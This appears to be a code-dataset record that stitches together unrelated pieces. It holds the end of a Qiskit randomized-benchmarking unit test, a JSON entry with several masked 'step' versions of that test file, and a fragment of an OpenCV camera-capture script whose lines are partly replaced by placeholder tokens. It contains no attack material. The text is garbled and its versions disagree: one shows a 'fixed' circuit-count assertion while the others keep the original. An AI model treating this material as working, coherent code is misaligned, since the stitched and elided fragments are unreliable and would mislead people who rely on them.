                        print(skip_msg)
                        continue

                    # Perform an ideal execution on the generated sequences
                    # basis_gates = ['u1','u2','u3','cx'] # use U, CX for now
                    # Shelly: changed format to fit qiskit current version
                    basis_gates = 'u1, u2, u3, cx'
                    shots = 100
                    result = []
                    for seed in range(rb_opts['nseeds']):
                        result.append(
                            qiskit.execute(rb_circs[seed], backend=backend,
                                           basis_gates=basis_gates,
                                           shots=shots).result())

                    # Verify the generated sequences
                    for seed in range(rb_opts['nseeds']):
                        length_vec = rb_opts['length_vector']
                        for circ_index, vec_len in enumerate(length_vec):

                            self.assertEqual(
                                rb_circs[seed][circ_index].name,
                                'rb_seed_%s_length_%s' % (
                                    str(seed), str(vec_len)),
                                'Error: incorrect circuit name')

                            self.verify_circuit(rb_circs[seed][circ_index],
                                                nq, rb_opts,
                                                vec_len, result[seed], shots)

                        # Each seed must yield exactly one circuit per entry
                        # of the length vector.  (Fixed: the original compared
                        # the last loop index against the number of seeds,
                        # which passed only by coincidence with nseeds=3 and
                        # a 4-entry length vector.)
                        self.assertEqual(len(rb_circs[seed]), len(length_vec),
                                         "Error: additional circuits exist")

    def test_rb_utils(self):
        """ Test some of the utility calculations, e.g.
        coherence limit"""

        t1 = 100.
        t2 = 100.
        gate2Q = 0.5
        gate1Q = 0.1
        twoq_coherence_err = rb.rb_utils.coherence_limit(2, [t1, t1],
                                                         [t2, t2], gate2Q)

        oneq_coherence_err = rb.rb_utils.coherence_limit(1, [t1],
                                                         [t2], gate1Q)

        self.assertAlmostEqual(oneq_coherence_err, 0.00049975, 6,
                               "Error: 1Q Coherence Limit")

        self.assertAlmostEqual(twoq_coherence_err, 0.00597, 5,
                               "Error: 2Q Coherence Limit")

        twoq_epc = rb.rb_utils.twoQ_clifford_error([5.2, 5.2, 1.5],
                                                   [0, 1, -1],
                                                   [0.001, 0.0015, 0.02])

        self.assertAlmostEqual(twoq_epc, 0.0446283, 6,
                               "Error: 2Q EPC Calculation")
# Allow running this test module directly as a script.
if __name__ == '__main__':
    unittest.main()
|
normal
|
{
"blob_id": "995e42312e286d82fa101128795d8aa60c1a6548",
"index": 4203,
"step-1": "<mask token>\n\n\nclass TestRB(unittest.TestCase):\n <mask token>\n\n @staticmethod\n def choose_pattern(pattern_type, nq):\n \"\"\"\n Choose a valid field for rb_opts['rb_pattern']\n :param pattern_type: a number between 0 and 2.\n 0 - a list of all qubits, for nq=5 it is\n [1, 2, 3, 4, 5]\n 1 - a list of lists of single qubits, for nq=5\n it is [[1], [2], [3], [4], [5]]\n 2 - randomly choose a pattern which is a list of\n two lists, for example for nq=5 it can be\n [[4, 1, 2], [5, 3]]\n :param nq: number of qubits\n :return: the pattern or None\n Returns None if the pattern type is not relevant to the\n number of qubits, i.e,, one of two cases:\n pattern_type = 1 and nq = 1, which implies [[1]]\n pattern_type = 2 and nq <= 2: - for nq=1 this is impossible\n - for nq=2 this implies\n [[1], [2]], which is already\n tested when pattern_type = 1\n \"\"\"\n if pattern_type == 0:\n res = [list(range(nq))]\n elif pattern_type == 1:\n if nq == 1:\n return None\n res = [[x] for x in range(nq)]\n else:\n if nq <= 2:\n return None\n shuffled_bits = list(range(nq))\n random.shuffle(shuffled_bits)\n split_loc = random.randint(1, nq - 1)\n res = [shuffled_bits[:split_loc], shuffled_bits[split_loc:]]\n return res\n\n @staticmethod\n def choose_multiplier(mult_opt, len_pattern):\n \"\"\"\n :param multi_opt:\n 0: fixed length\n 1: vector of lengths\n :param len_pattern: number of patterns\n :return: the length multiplier\n \"\"\"\n if mult_opt == 0:\n res = 1\n else:\n res = [(i + 1) for i in range(len_pattern)]\n return res\n\n def verify_circuit(self, circ, nq, rb_opts, vec_len, result, shots):\n \"\"\"\n For a single sequence, verifies that it meets the requirements:\n - Executing it on the ground state ends up in the ground state\n - It has the correct number of Cliffords\n - It fulfills the pattern, as specified by rb_patterns and\n length_multiplier\n :param circ: the sequence to check\n :param nq: number of qubits\n :param rb_opts: the specification that 
generated the set of sequences\n which includes circ\n :param vec_len: the expected length vector of circ (one of\n rb_opts['length_vector'])\n :param result: the output of the simulator\n when executing all the sequences on the ground state\n :param shots: the number of shots in the simulator execution\n \"\"\"\n if not hasattr(rb_opts['length_multiplier'], '__len__'):\n rb_opts['length_multiplier'] = [rb_opts['length_multiplier'] for\n i in range(len(rb_opts['rb_pattern']))]\n ops = circ.data\n op_index = 0\n for _ in range(vec_len):\n for pat_index in range(len(rb_opts['rb_pattern'])):\n for _ in range(rb_opts['length_multiplier'][pat_index]):\n while ops[op_index].name != 'barrier':\n self.assertTrue(all(x[1] in rb_opts['rb_pattern'][\n pat_index] for x in ops[op_index].qargs),\n 'Error: operation acts on incorrect qubits')\n op_index += 1\n op_index += 1\n self.assertEqual(result.get_counts(circ)['{0:b}'.format(0).zfill(nq\n )], shots, \n 'Error: %d qubit RB does not return the ground state back to the ground state'\n % nq)\n\n def test_rb(self):\n \"\"\" Main function of the test \"\"\"\n backend = qiskit.Aer.get_backend('qasm_simulator')\n nq_list = [1, 2]\n for nq in nq_list:\n print('Testing %d qubit RB' % nq)\n for pattern_type in range(2):\n for multiplier_type in range(2):\n rb_opts = {}\n rb_opts['nseeds'] = 3\n rb_opts['length_vector'] = [1, 3, 4, 7]\n rb_opts['rb_pattern'] = self.choose_pattern(pattern_type,\n nq)\n if rb_opts['rb_pattern'] is None:\n continue\n rb_opts['length_multiplier'] = self.choose_multiplier(\n multiplier_type, len(rb_opts['rb_pattern']))\n try:\n rb_circs, _ = rb.randomized_benchmarking_seq(**rb_opts)\n except OSError:\n skip_msg = (\n 'Skipping tests for %s qubits because tables are missing'\n % str(nq))\n print(skip_msg)\n continue\n basis_gates = 'u1, u2, u3, cx'\n shots = 100\n result = []\n for seed in range(rb_opts['nseeds']):\n result.append(qiskit.execute(rb_circs[seed],\n backend=backend, basis_gates=basis_gates, 
shots\n =shots).result())\n for seed in range(rb_opts['nseeds']):\n length_vec = rb_opts['length_vector']\n for circ_index, vec_len in enumerate(length_vec):\n self.assertEqual(rb_circs[seed][circ_index].\n name, 'rb_seed_%s_length_%s' % (str(seed),\n str(vec_len)), 'Error: incorrect circuit name')\n self.verify_circuit(rb_circs[seed][circ_index],\n nq, rb_opts, vec_len, result[seed], shots)\n self.assertEqual(circ_index, len(rb_circs),\n 'Error: additional circuits exist')\n\n def test_rb_utils(self):\n \"\"\" Test some of the utility calculations, e.g.\n coherence limit\"\"\"\n t1 = 100.0\n t2 = 100.0\n gate2Q = 0.5\n gate1Q = 0.1\n twoq_coherence_err = rb.rb_utils.coherence_limit(2, [t1, t1], [t2,\n t2], gate2Q)\n oneq_coherence_err = rb.rb_utils.coherence_limit(1, [t1], [t2], gate1Q)\n self.assertAlmostEqual(oneq_coherence_err, 0.00049975, 6,\n 'Error: 1Q Coherence Limit')\n self.assertAlmostEqual(twoq_coherence_err, 0.00597, 5,\n 'Error: 2Q Coherence Limit')\n twoq_epc = rb.rb_utils.twoQ_clifford_error([5.2, 5.2, 1.5], [0, 1, \n -1], [0.001, 0.0015, 0.02])\n self.assertAlmostEqual(twoq_epc, 0.0446283, 6,\n 'Error: 2Q EPC Calculation')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TestRB(unittest.TestCase):\n \"\"\" The test class \"\"\"\n\n @staticmethod\n def choose_pattern(pattern_type, nq):\n \"\"\"\n Choose a valid field for rb_opts['rb_pattern']\n :param pattern_type: a number between 0 and 2.\n 0 - a list of all qubits, for nq=5 it is\n [1, 2, 3, 4, 5]\n 1 - a list of lists of single qubits, for nq=5\n it is [[1], [2], [3], [4], [5]]\n 2 - randomly choose a pattern which is a list of\n two lists, for example for nq=5 it can be\n [[4, 1, 2], [5, 3]]\n :param nq: number of qubits\n :return: the pattern or None\n Returns None if the pattern type is not relevant to the\n number of qubits, i.e,, one of two cases:\n pattern_type = 1 and nq = 1, which implies [[1]]\n pattern_type = 2 and nq <= 2: - for nq=1 this is impossible\n - for nq=2 this implies\n [[1], [2]], which is already\n tested when pattern_type = 1\n \"\"\"\n if pattern_type == 0:\n res = [list(range(nq))]\n elif pattern_type == 1:\n if nq == 1:\n return None\n res = [[x] for x in range(nq)]\n else:\n if nq <= 2:\n return None\n shuffled_bits = list(range(nq))\n random.shuffle(shuffled_bits)\n split_loc = random.randint(1, nq - 1)\n res = [shuffled_bits[:split_loc], shuffled_bits[split_loc:]]\n return res\n\n @staticmethod\n def choose_multiplier(mult_opt, len_pattern):\n \"\"\"\n :param multi_opt:\n 0: fixed length\n 1: vector of lengths\n :param len_pattern: number of patterns\n :return: the length multiplier\n \"\"\"\n if mult_opt == 0:\n res = 1\n else:\n res = [(i + 1) for i in range(len_pattern)]\n return res\n\n def verify_circuit(self, circ, nq, rb_opts, vec_len, result, shots):\n \"\"\"\n For a single sequence, verifies that it meets the requirements:\n - Executing it on the ground state ends up in the ground state\n - It has the correct number of Cliffords\n - It fulfills the pattern, as specified by rb_patterns and\n length_multiplier\n :param circ: the sequence to check\n :param nq: number of qubits\n :param rb_opts: the 
specification that generated the set of sequences\n which includes circ\n :param vec_len: the expected length vector of circ (one of\n rb_opts['length_vector'])\n :param result: the output of the simulator\n when executing all the sequences on the ground state\n :param shots: the number of shots in the simulator execution\n \"\"\"\n if not hasattr(rb_opts['length_multiplier'], '__len__'):\n rb_opts['length_multiplier'] = [rb_opts['length_multiplier'] for\n i in range(len(rb_opts['rb_pattern']))]\n ops = circ.data\n op_index = 0\n for _ in range(vec_len):\n for pat_index in range(len(rb_opts['rb_pattern'])):\n for _ in range(rb_opts['length_multiplier'][pat_index]):\n while ops[op_index].name != 'barrier':\n self.assertTrue(all(x[1] in rb_opts['rb_pattern'][\n pat_index] for x in ops[op_index].qargs),\n 'Error: operation acts on incorrect qubits')\n op_index += 1\n op_index += 1\n self.assertEqual(result.get_counts(circ)['{0:b}'.format(0).zfill(nq\n )], shots, \n 'Error: %d qubit RB does not return the ground state back to the ground state'\n % nq)\n\n def test_rb(self):\n \"\"\" Main function of the test \"\"\"\n backend = qiskit.Aer.get_backend('qasm_simulator')\n nq_list = [1, 2]\n for nq in nq_list:\n print('Testing %d qubit RB' % nq)\n for pattern_type in range(2):\n for multiplier_type in range(2):\n rb_opts = {}\n rb_opts['nseeds'] = 3\n rb_opts['length_vector'] = [1, 3, 4, 7]\n rb_opts['rb_pattern'] = self.choose_pattern(pattern_type,\n nq)\n if rb_opts['rb_pattern'] is None:\n continue\n rb_opts['length_multiplier'] = self.choose_multiplier(\n multiplier_type, len(rb_opts['rb_pattern']))\n try:\n rb_circs, _ = rb.randomized_benchmarking_seq(**rb_opts)\n except OSError:\n skip_msg = (\n 'Skipping tests for %s qubits because tables are missing'\n % str(nq))\n print(skip_msg)\n continue\n basis_gates = 'u1, u2, u3, cx'\n shots = 100\n result = []\n for seed in range(rb_opts['nseeds']):\n result.append(qiskit.execute(rb_circs[seed],\n backend=backend, 
basis_gates=basis_gates, shots\n =shots).result())\n for seed in range(rb_opts['nseeds']):\n length_vec = rb_opts['length_vector']\n for circ_index, vec_len in enumerate(length_vec):\n self.assertEqual(rb_circs[seed][circ_index].\n name, 'rb_seed_%s_length_%s' % (str(seed),\n str(vec_len)), 'Error: incorrect circuit name')\n self.verify_circuit(rb_circs[seed][circ_index],\n nq, rb_opts, vec_len, result[seed], shots)\n self.assertEqual(circ_index, len(rb_circs),\n 'Error: additional circuits exist')\n\n def test_rb_utils(self):\n \"\"\" Test some of the utility calculations, e.g.\n coherence limit\"\"\"\n t1 = 100.0\n t2 = 100.0\n gate2Q = 0.5\n gate1Q = 0.1\n twoq_coherence_err = rb.rb_utils.coherence_limit(2, [t1, t1], [t2,\n t2], gate2Q)\n oneq_coherence_err = rb.rb_utils.coherence_limit(1, [t1], [t2], gate1Q)\n self.assertAlmostEqual(oneq_coherence_err, 0.00049975, 6,\n 'Error: 1Q Coherence Limit')\n self.assertAlmostEqual(twoq_coherence_err, 0.00597, 5,\n 'Error: 2Q Coherence Limit')\n twoq_epc = rb.rb_utils.twoQ_clifford_error([5.2, 5.2, 1.5], [0, 1, \n -1], [0.001, 0.0015, 0.02])\n self.assertAlmostEqual(twoq_epc, 0.0446283, 6,\n 'Error: 2Q EPC Calculation')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TestRB(unittest.TestCase):\n \"\"\" The test class \"\"\"\n\n @staticmethod\n def choose_pattern(pattern_type, nq):\n \"\"\"\n Choose a valid field for rb_opts['rb_pattern']\n :param pattern_type: a number between 0 and 2.\n 0 - a list of all qubits, for nq=5 it is\n [1, 2, 3, 4, 5]\n 1 - a list of lists of single qubits, for nq=5\n it is [[1], [2], [3], [4], [5]]\n 2 - randomly choose a pattern which is a list of\n two lists, for example for nq=5 it can be\n [[4, 1, 2], [5, 3]]\n :param nq: number of qubits\n :return: the pattern or None\n Returns None if the pattern type is not relevant to the\n number of qubits, i.e,, one of two cases:\n pattern_type = 1 and nq = 1, which implies [[1]]\n pattern_type = 2 and nq <= 2: - for nq=1 this is impossible\n - for nq=2 this implies\n [[1], [2]], which is already\n tested when pattern_type = 1\n \"\"\"\n if pattern_type == 0:\n res = [list(range(nq))]\n elif pattern_type == 1:\n if nq == 1:\n return None\n res = [[x] for x in range(nq)]\n else:\n if nq <= 2:\n return None\n shuffled_bits = list(range(nq))\n random.shuffle(shuffled_bits)\n split_loc = random.randint(1, nq - 1)\n res = [shuffled_bits[:split_loc], shuffled_bits[split_loc:]]\n return res\n\n @staticmethod\n def choose_multiplier(mult_opt, len_pattern):\n \"\"\"\n :param multi_opt:\n 0: fixed length\n 1: vector of lengths\n :param len_pattern: number of patterns\n :return: the length multiplier\n \"\"\"\n if mult_opt == 0:\n res = 1\n else:\n res = [(i + 1) for i in range(len_pattern)]\n return res\n\n def verify_circuit(self, circ, nq, rb_opts, vec_len, result, shots):\n \"\"\"\n For a single sequence, verifies that it meets the requirements:\n - Executing it on the ground state ends up in the ground state\n - It has the correct number of Cliffords\n - It fulfills the pattern, as specified by rb_patterns and\n length_multiplier\n :param circ: the sequence to check\n :param nq: number of qubits\n :param rb_opts: the 
specification that generated the set of sequences\n which includes circ\n :param vec_len: the expected length vector of circ (one of\n rb_opts['length_vector'])\n :param result: the output of the simulator\n when executing all the sequences on the ground state\n :param shots: the number of shots in the simulator execution\n \"\"\"\n if not hasattr(rb_opts['length_multiplier'], '__len__'):\n rb_opts['length_multiplier'] = [rb_opts['length_multiplier'] for\n i in range(len(rb_opts['rb_pattern']))]\n ops = circ.data\n op_index = 0\n for _ in range(vec_len):\n for pat_index in range(len(rb_opts['rb_pattern'])):\n for _ in range(rb_opts['length_multiplier'][pat_index]):\n while ops[op_index].name != 'barrier':\n self.assertTrue(all(x[1] in rb_opts['rb_pattern'][\n pat_index] for x in ops[op_index].qargs),\n 'Error: operation acts on incorrect qubits')\n op_index += 1\n op_index += 1\n self.assertEqual(result.get_counts(circ)['{0:b}'.format(0).zfill(nq\n )], shots, \n 'Error: %d qubit RB does not return the ground state back to the ground state'\n % nq)\n\n def test_rb(self):\n \"\"\" Main function of the test \"\"\"\n backend = qiskit.Aer.get_backend('qasm_simulator')\n nq_list = [1, 2]\n for nq in nq_list:\n print('Testing %d qubit RB' % nq)\n for pattern_type in range(2):\n for multiplier_type in range(2):\n rb_opts = {}\n rb_opts['nseeds'] = 3\n rb_opts['length_vector'] = [1, 3, 4, 7]\n rb_opts['rb_pattern'] = self.choose_pattern(pattern_type,\n nq)\n if rb_opts['rb_pattern'] is None:\n continue\n rb_opts['length_multiplier'] = self.choose_multiplier(\n multiplier_type, len(rb_opts['rb_pattern']))\n try:\n rb_circs, _ = rb.randomized_benchmarking_seq(**rb_opts)\n except OSError:\n skip_msg = (\n 'Skipping tests for %s qubits because tables are missing'\n % str(nq))\n print(skip_msg)\n continue\n basis_gates = 'u1, u2, u3, cx'\n shots = 100\n result = []\n for seed in range(rb_opts['nseeds']):\n result.append(qiskit.execute(rb_circs[seed],\n backend=backend, 
basis_gates=basis_gates, shots\n =shots).result())\n for seed in range(rb_opts['nseeds']):\n length_vec = rb_opts['length_vector']\n for circ_index, vec_len in enumerate(length_vec):\n self.assertEqual(rb_circs[seed][circ_index].\n name, 'rb_seed_%s_length_%s' % (str(seed),\n str(vec_len)), 'Error: incorrect circuit name')\n self.verify_circuit(rb_circs[seed][circ_index],\n nq, rb_opts, vec_len, result[seed], shots)\n self.assertEqual(circ_index, len(rb_circs),\n 'Error: additional circuits exist')\n\n def test_rb_utils(self):\n \"\"\" Test some of the utility calculations, e.g.\n coherence limit\"\"\"\n t1 = 100.0\n t2 = 100.0\n gate2Q = 0.5\n gate1Q = 0.1\n twoq_coherence_err = rb.rb_utils.coherence_limit(2, [t1, t1], [t2,\n t2], gate2Q)\n oneq_coherence_err = rb.rb_utils.coherence_limit(1, [t1], [t2], gate1Q)\n self.assertAlmostEqual(oneq_coherence_err, 0.00049975, 6,\n 'Error: 1Q Coherence Limit')\n self.assertAlmostEqual(twoq_coherence_err, 0.00597, 5,\n 'Error: 2Q Coherence Limit')\n twoq_epc = rb.rb_utils.twoQ_clifford_error([5.2, 5.2, 1.5], [0, 1, \n -1], [0.001, 0.0015, 0.02])\n self.assertAlmostEqual(twoq_epc, 0.0446283, 6,\n 'Error: 2Q EPC Calculation')\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-4": "<mask token>\nimport unittest\nimport random\nimport qiskit\nimport qiskit.ignis.verification.randomized_benchmarking as rb\n\n\nclass TestRB(unittest.TestCase):\n \"\"\" The test class \"\"\"\n\n @staticmethod\n def choose_pattern(pattern_type, nq):\n \"\"\"\n Choose a valid field for rb_opts['rb_pattern']\n :param pattern_type: a number between 0 and 2.\n 0 - a list of all qubits, for nq=5 it is\n [1, 2, 3, 4, 5]\n 1 - a list of lists of single qubits, for nq=5\n it is [[1], [2], [3], [4], [5]]\n 2 - randomly choose a pattern which is a list of\n two lists, for example for nq=5 it can be\n [[4, 1, 2], [5, 3]]\n :param nq: number of qubits\n :return: the pattern or None\n Returns None if the pattern type is not relevant to the\n number of qubits, i.e,, one of two cases:\n pattern_type = 1 and nq = 1, which implies [[1]]\n pattern_type = 2 and nq <= 2: - for nq=1 this is impossible\n - for nq=2 this implies\n [[1], [2]], which is already\n tested when pattern_type = 1\n \"\"\"\n if pattern_type == 0:\n res = [list(range(nq))]\n elif pattern_type == 1:\n if nq == 1:\n return None\n res = [[x] for x in range(nq)]\n else:\n if nq <= 2:\n return None\n shuffled_bits = list(range(nq))\n random.shuffle(shuffled_bits)\n split_loc = random.randint(1, nq - 1)\n res = [shuffled_bits[:split_loc], shuffled_bits[split_loc:]]\n return res\n\n @staticmethod\n def choose_multiplier(mult_opt, len_pattern):\n \"\"\"\n :param multi_opt:\n 0: fixed length\n 1: vector of lengths\n :param len_pattern: number of patterns\n :return: the length multiplier\n \"\"\"\n if mult_opt == 0:\n res = 1\n else:\n res = [(i + 1) for i in range(len_pattern)]\n return res\n\n def verify_circuit(self, circ, nq, rb_opts, vec_len, result, shots):\n \"\"\"\n For a single sequence, verifies that it meets the requirements:\n - Executing it on the ground state ends up in the ground state\n - It has the correct number of Cliffords\n - It fulfills the pattern, as specified by rb_patterns and\n 
length_multiplier\n :param circ: the sequence to check\n :param nq: number of qubits\n :param rb_opts: the specification that generated the set of sequences\n which includes circ\n :param vec_len: the expected length vector of circ (one of\n rb_opts['length_vector'])\n :param result: the output of the simulator\n when executing all the sequences on the ground state\n :param shots: the number of shots in the simulator execution\n \"\"\"\n if not hasattr(rb_opts['length_multiplier'], '__len__'):\n rb_opts['length_multiplier'] = [rb_opts['length_multiplier'] for\n i in range(len(rb_opts['rb_pattern']))]\n ops = circ.data\n op_index = 0\n for _ in range(vec_len):\n for pat_index in range(len(rb_opts['rb_pattern'])):\n for _ in range(rb_opts['length_multiplier'][pat_index]):\n while ops[op_index].name != 'barrier':\n self.assertTrue(all(x[1] in rb_opts['rb_pattern'][\n pat_index] for x in ops[op_index].qargs),\n 'Error: operation acts on incorrect qubits')\n op_index += 1\n op_index += 1\n self.assertEqual(result.get_counts(circ)['{0:b}'.format(0).zfill(nq\n )], shots, \n 'Error: %d qubit RB does not return the ground state back to the ground state'\n % nq)\n\n def test_rb(self):\n \"\"\" Main function of the test \"\"\"\n backend = qiskit.Aer.get_backend('qasm_simulator')\n nq_list = [1, 2]\n for nq in nq_list:\n print('Testing %d qubit RB' % nq)\n for pattern_type in range(2):\n for multiplier_type in range(2):\n rb_opts = {}\n rb_opts['nseeds'] = 3\n rb_opts['length_vector'] = [1, 3, 4, 7]\n rb_opts['rb_pattern'] = self.choose_pattern(pattern_type,\n nq)\n if rb_opts['rb_pattern'] is None:\n continue\n rb_opts['length_multiplier'] = self.choose_multiplier(\n multiplier_type, len(rb_opts['rb_pattern']))\n try:\n rb_circs, _ = rb.randomized_benchmarking_seq(**rb_opts)\n except OSError:\n skip_msg = (\n 'Skipping tests for %s qubits because tables are missing'\n % str(nq))\n print(skip_msg)\n continue\n basis_gates = 'u1, u2, u3, cx'\n shots = 100\n result = []\n for 
seed in range(rb_opts['nseeds']):\n result.append(qiskit.execute(rb_circs[seed],\n backend=backend, basis_gates=basis_gates, shots\n =shots).result())\n for seed in range(rb_opts['nseeds']):\n length_vec = rb_opts['length_vector']\n for circ_index, vec_len in enumerate(length_vec):\n self.assertEqual(rb_circs[seed][circ_index].\n name, 'rb_seed_%s_length_%s' % (str(seed),\n str(vec_len)), 'Error: incorrect circuit name')\n self.verify_circuit(rb_circs[seed][circ_index],\n nq, rb_opts, vec_len, result[seed], shots)\n self.assertEqual(circ_index, len(rb_circs),\n 'Error: additional circuits exist')\n\n def test_rb_utils(self):\n \"\"\" Test some of the utility calculations, e.g.\n coherence limit\"\"\"\n t1 = 100.0\n t2 = 100.0\n gate2Q = 0.5\n gate1Q = 0.1\n twoq_coherence_err = rb.rb_utils.coherence_limit(2, [t1, t1], [t2,\n t2], gate2Q)\n oneq_coherence_err = rb.rb_utils.coherence_limit(1, [t1], [t2], gate1Q)\n self.assertAlmostEqual(oneq_coherence_err, 0.00049975, 6,\n 'Error: 1Q Coherence Limit')\n self.assertAlmostEqual(twoq_coherence_err, 0.00597, 5,\n 'Error: 2Q Coherence Limit')\n twoq_epc = rb.rb_utils.twoQ_clifford_error([5.2, 5.2, 1.5], [0, 1, \n -1], [0.001, 0.0015, 0.02])\n self.assertAlmostEqual(twoq_epc, 0.0446283, 6,\n 'Error: 2Q EPC Calculation')\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": "# -*- coding: utf-8 -*-\n\n# Copyright 2019, IBM.\n#\n# This source code is licensed under the Apache License, Version 2.0 found in\n# the LICENSE.txt file in the root directory of this source tree.\n\n# pylint: disable=undefined-loop-variable\n\n\"\"\"\nRun through RB for different qubit numbers to check that it's working\nand that it returns the identity\n\"\"\"\n\nimport unittest\nimport random\nimport qiskit\nimport qiskit.ignis.verification.randomized_benchmarking as rb\n\n\nclass TestRB(unittest.TestCase):\n \"\"\" The test class \"\"\"\n\n @staticmethod\n def choose_pattern(pattern_type, nq):\n '''\n Choose a valid field for rb_opts['rb_pattern']\n :param pattern_type: a number between 0 and 2.\n 0 - a list of all qubits, for nq=5 it is\n [1, 2, 3, 4, 5]\n 1 - a list of lists of single qubits, for nq=5\n it is [[1], [2], [3], [4], [5]]\n 2 - randomly choose a pattern which is a list of\n two lists, for example for nq=5 it can be\n [[4, 1, 2], [5, 3]]\n :param nq: number of qubits\n :return: the pattern or None\n Returns None if the pattern type is not relevant to the\n number of qubits, i.e,, one of two cases:\n pattern_type = 1 and nq = 1, which implies [[1]]\n pattern_type = 2 and nq <= 2: - for nq=1 this is impossible\n - for nq=2 this implies\n [[1], [2]], which is already\n tested when pattern_type = 1\n '''\n\n if pattern_type == 0:\n res = [list(range(nq))]\n elif pattern_type == 1:\n if nq == 1:\n return None\n res = [[x] for x in range(nq)]\n else:\n if nq <= 2:\n return None\n shuffled_bits = list(range(nq))\n random.shuffle(shuffled_bits)\n split_loc = random.randint(1, nq-1)\n res = [shuffled_bits[:split_loc], shuffled_bits[split_loc:]]\n\n return res\n\n @staticmethod\n def choose_multiplier(mult_opt, len_pattern):\n '''\n :param multi_opt:\n 0: fixed length\n 1: vector of lengths\n :param len_pattern: number of patterns\n :return: the length multiplier\n '''\n if mult_opt == 0:\n res = 1\n else:\n res = [i + 1 for i in 
range(len_pattern)]\n\n return res\n\n def verify_circuit(self, circ, nq, rb_opts, vec_len, result, shots):\n '''\n For a single sequence, verifies that it meets the requirements:\n - Executing it on the ground state ends up in the ground state\n - It has the correct number of Cliffords\n - It fulfills the pattern, as specified by rb_patterns and\n length_multiplier\n :param circ: the sequence to check\n :param nq: number of qubits\n :param rb_opts: the specification that generated the set of sequences\n which includes circ\n :param vec_len: the expected length vector of circ (one of\n rb_opts['length_vector'])\n :param result: the output of the simulator\n when executing all the sequences on the ground state\n :param shots: the number of shots in the simulator execution\n '''\n\n if not hasattr(rb_opts['length_multiplier'], \"__len__\"):\n rb_opts['length_multiplier'] = [\n rb_opts['length_multiplier'] for i in range(\n len(rb_opts['rb_pattern']))]\n\n ops = circ.data\n op_index = 0\n # for each cycle (the sequence should consist of vec_len cycles)\n for _ in range(vec_len):\n # for each component of the pattern...\n for pat_index in range(len(rb_opts['rb_pattern'])):\n # for each Clifford...\n for _ in range(rb_opts['length_multiplier'][pat_index]):\n # for each basis gate...\n while ops[op_index].name != 'barrier':\n # Verify that the gate acts on the correct qubits\n # This happens if the sequence is composed of the\n # correct sub-sequences, as specified by vec_len and\n # rb_opts\n self.assertTrue(\n all(x[1] in rb_opts['rb_pattern'][pat_index]\n for x in ops[op_index].qargs),\n \"Error: operation acts on incorrect qubits\")\n op_index += 1\n # increment because of the barrier gate\n op_index += 1\n # check if the ground state returns\n self.assertEqual(result.\n get_counts(circ)['{0:b}'.format(0).zfill(nq)], shots,\n \"Error: %d qubit RB does not return the \\\n ground state back to the ground state\" % nq)\n\n def test_rb(self):\n \"\"\" Main function of 
the test \"\"\"\n\n # Load simulator\n backend = qiskit.Aer.get_backend('qasm_simulator')\n\n # Test up to 2 qubits\n nq_list = [1, 2]\n\n for nq in nq_list:\n\n print(\"Testing %d qubit RB\" % nq)\n\n for pattern_type in range(2):\n for multiplier_type in range(2):\n # See documentation of choose_pattern for the meaning of\n # the different pattern types\n\n rb_opts = {}\n rb_opts['nseeds'] = 3\n rb_opts['length_vector'] = [1, 3, 4, 7]\n rb_opts['rb_pattern'] = self.choose_pattern(\n pattern_type, nq)\n # if the pattern type is not relevant for nq\n if rb_opts['rb_pattern'] is None:\n continue\n rb_opts['length_multiplier'] = self.choose_multiplier(\n multiplier_type, len(rb_opts['rb_pattern']))\n\n # Generate the sequences\n try:\n rb_circs, _ = rb.randomized_benchmarking_seq(**rb_opts)\n except OSError:\n skip_msg = ('Skipping tests for %s qubits because '\n 'tables are missing' % str(nq))\n print(skip_msg)\n continue\n\n # Perform an ideal execution on the generated sequences\n # basis_gates = ['u1','u2','u3','cx'] # use U, CX for now\n # Shelly: changed format to fit qiskit current version\n basis_gates = 'u1, u2, u3, cx'\n shots = 100\n result = []\n for seed in range(rb_opts['nseeds']):\n result.append(\n qiskit.execute(rb_circs[seed], backend=backend,\n basis_gates=basis_gates,\n shots=shots).result())\n\n # Verify the generated sequences\n for seed in range(rb_opts['nseeds']):\n length_vec = rb_opts['length_vector']\n for circ_index, vec_len in enumerate(length_vec):\n\n self.assertEqual(\n rb_circs[seed][circ_index].name,\n 'rb_seed_%s_length_%s' % (\n str(seed), str(vec_len)),\n 'Error: incorrect circuit name')\n self.verify_circuit(rb_circs[seed][circ_index],\n nq, rb_opts,\n vec_len, result[seed], shots)\n\n self.assertEqual(circ_index, len(rb_circs),\n \"Error: additional circuits exist\")\n\n def test_rb_utils(self):\n\n \"\"\" Test some of the utility calculations, e.g.\n coherence limit\"\"\"\n\n t1 = 100.\n t2 = 100.\n gate2Q = 0.5\n gate1Q = 
0.1\n twoq_coherence_err = rb.rb_utils.coherence_limit(2, [t1, t1],\n [t2, t2], gate2Q)\n\n oneq_coherence_err = rb.rb_utils.coherence_limit(1, [t1],\n [t2], gate1Q)\n\n self.assertAlmostEqual(oneq_coherence_err, 0.00049975, 6,\n \"Error: 1Q Coherence Limit\")\n\n self.assertAlmostEqual(twoq_coherence_err, 0.00597, 5,\n \"Error: 2Q Coherence Limit\")\n\n twoq_epc = rb.rb_utils.twoQ_clifford_error([5.2, 5.2, 1.5],\n [0, 1, -1],\n [0.001, 0.0015, 0.02])\n\n self.assertAlmostEqual(twoq_epc, 0.0446283, 6,\n \"Error: 2Q EPC Calculation\")\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-ids": [
6,
7,
8,
9,
10
]
}
|
[
6,
7,
8,
9,
10
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if type(video_path).__name__ == 'str':
videoReader = cv2.VideoCapture(video_path)
print('Load live video from file...')
elif type(video_path).__name__ == 'int':
videoReader = cv2.VideoCapture(video_path)
print('Get live video from camera...')
if videoReader.isOpened():
print('Camera staus ready...')
else:
print('Camera status fault...')
exit()
<|reserved_special_token_0|>
print('Live Video FPS: ', video_fps)
<|reserved_special_token_0|>
print('Live Video Size: ', video_size)
<|reserved_special_token_0|>
while videoReader.isOpened():
success, frame = videoReader.read()
if success:
print('Live Video Frame Shape: {}'.format(frame.shape))
cv2.putText(frame, 'Live Camera', (470, 30), cv2.
FONT_HERSHEY_SIMPLEX, 0.8, (0, 255, 255), 2)
cv2.namedWindow('Live Video', 0)
cv2.imshow('Live Video', frame)
videoWriter.write(frame)
cv2.waitKey(20)
if cv2.waitKey(1) & 255 == ord('q'):
break
else:
continue
